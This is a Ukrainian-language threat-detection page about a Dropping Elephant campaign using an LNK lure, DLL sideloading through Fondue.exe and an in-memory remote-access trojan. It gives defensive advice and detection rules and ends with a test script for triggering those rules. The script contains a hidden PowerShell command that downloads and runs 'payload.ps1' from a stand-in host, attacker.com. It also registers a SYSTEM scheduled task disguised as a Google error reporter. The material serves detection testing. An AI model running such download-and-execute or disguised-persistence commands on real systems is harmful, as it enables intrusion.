Шкідливе ПЗ à la Mode: всередині ланцюга завантажувачів Dropping Elephant
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Вишукана кампанія, приписувана Dropping Elephant, використовує документи-приманки з китайською тематикою для доставки оновленого трояна віддаленого доступу, який зберігається в пам’яті. Вторгнення покладається на завантаження DLL через легітимний бінарний файл Microsoft та завантажувач Donut shellcode, щоб уникнути виявлення на диску. Кінцеве навантаження також використовує передові методи ухилення, включаючи вирівнювання потоку управління та реконструкцію API під час виконання.
Розслідування
Дослідники Rapid7 виявили загрозу під час проактивного полювання, яке почалося з шкідливого ярлика Windows, який маскувався під PDF-документ. Їхнє розслідування відстежило ланцюг завантаження з початкової постановки на chinagreenenergy[.]org через завантаження DLL з APPWIZ.cpl до виконання трояна в пам’яті. Аналіз на рівні коду з Diaphora підтвердив спільне походження з ранніми зразками Dropping Elephant, незважаючи на значну переробку.
Пом’якшення
Захисникам слід приділити пріоритет поведінковим виявленням, таким як ярлики, що запускають PowerShell, і підозріла постановка навантажень у C:UsersPublic. Моніторинг планових завдань з незвичними іменами та визначення завантаження DLL з неочікуваних директорій також важливі. Крім того, завдання захисту кінцевих точок повинні бути видимими на рівні пам’яті для виявлення маніпуляцій з AMSI, WLDP і ETW.
Реакція
Якщо ця активність виявлена, негайно ізолюйте уражені системи, щоб порушити подальший трафік команди і контролю. Виконайте форензіку пам’яті, щоб виявити ін’єкцію трояна, і перевірте планові завдання на стійкість. Також слід переглянути журнали мережі на несанкціонований HTTPS-трафік до відомих доменів C2 та будь-які ознаки ексфільтрації файлів.
Потік атаки
Виявлення
Можлива спроба зв’язку з доменом пошукового запиту IP (через DNS)
Переглянути
Незвичайна зміна коду сторінки (через cmdline)
Переглянути
Підозріле заплановане завдання (через аудит)
Переглянути
Підозріле виконання з загального профілю користувача (через процес_створення)
Переглянути
Бібліотека Vcruntime140 завантажена з підозрілої директорії (через завантаження зображення)
Переглянути
Підозрілі файли в загальному профілі користувача (через file_event)
Переглянути
Виявлення кампанії Dropping Elephant [Мережеве з’єднання Windows]
Переглянути
Шкідливе завантаження DLL через Fondue.exe [Файловий захід Windows]
Переглянути
Виявлення кампанії Dropping Elephant через ярлик та завантаження [Створення процесу Windows]
Переглянути
Виконання симуляції
Необхідна умова: Перевірка телеметрії та базової лінії повинна пройти.
Обґрунтування: У цьому розділі детально описано точне виконання техніки супротивника (TTP), що призначена для активації правила виявлення. Команди та розповідь ПОВИННІ точно відображати визначені TTP та мають на меті створити точну телеметрію, яку очікує логіка виявлення.
-
Опис атаки та команди: Супротивник має на меті встановити стійкість та виконати завантажувач. Щоб обійти стандартні фільтри електронної пошти, вони використовують ярлик під назвою
GRES3001.lnk, що виглядає як PDF. Коли на нього натискають, він викликаєconhost.exeдля запуску скрипту PowerShell. Одночасно вони встановлюють стійкість, створюючи заплановане завдання під назвоюGoogleErrorReport, яке призначено для запускуFondue.exeз загальної директорії, маскуючись під легітимний репортер помилок Google, щоб уникнути поверхневого огляду. -
Сценарій регресійного тестування:
# 1. Симулюємо поведінку Ярлика/Conhost # Ми симулюємо виконання conhost.exe зі специфічним рядком у командному рядку Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" # Примітка: Щоб строго відповідати 'CommandLine contains GRES3001.lnk', ми симулюємо виклик процесу так, ніби він походить з цього файлу. # Оскільки ми не можемо легко підробити ім'я батьківського процесу в простому скрипті, ми симулюємо цільовий рядок команд. Write-Host "[!] Симулюємо тригер GRES3001.lnk..." $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Loaded'" # У реальному середовищі поле 'CommandLine' у Sysmon міститиме цільовий рядок. # 2. Симуляція запланованого завдання та завантаження Fondue.exe Write-Host "[!] Симулюємо заплановане завдання GoogleErrorReport..." New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload" $TaskName = "GoogleErrorReport" $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe" Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Simulated Dropping Elephant Task" -User "SYSTEM" -Force Write-Host "[+] Симуляція завершена. Перевірте SIEM на наявність попереджень." -
Команди очищення:
# Видалити фіктивний шкідливий бінарник Remove-Item -Path "C:UsersPublicFondue.exe" -Force # Видалити шкідливе заплановане завдання Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false Write-Host "[+] Очищення завершено."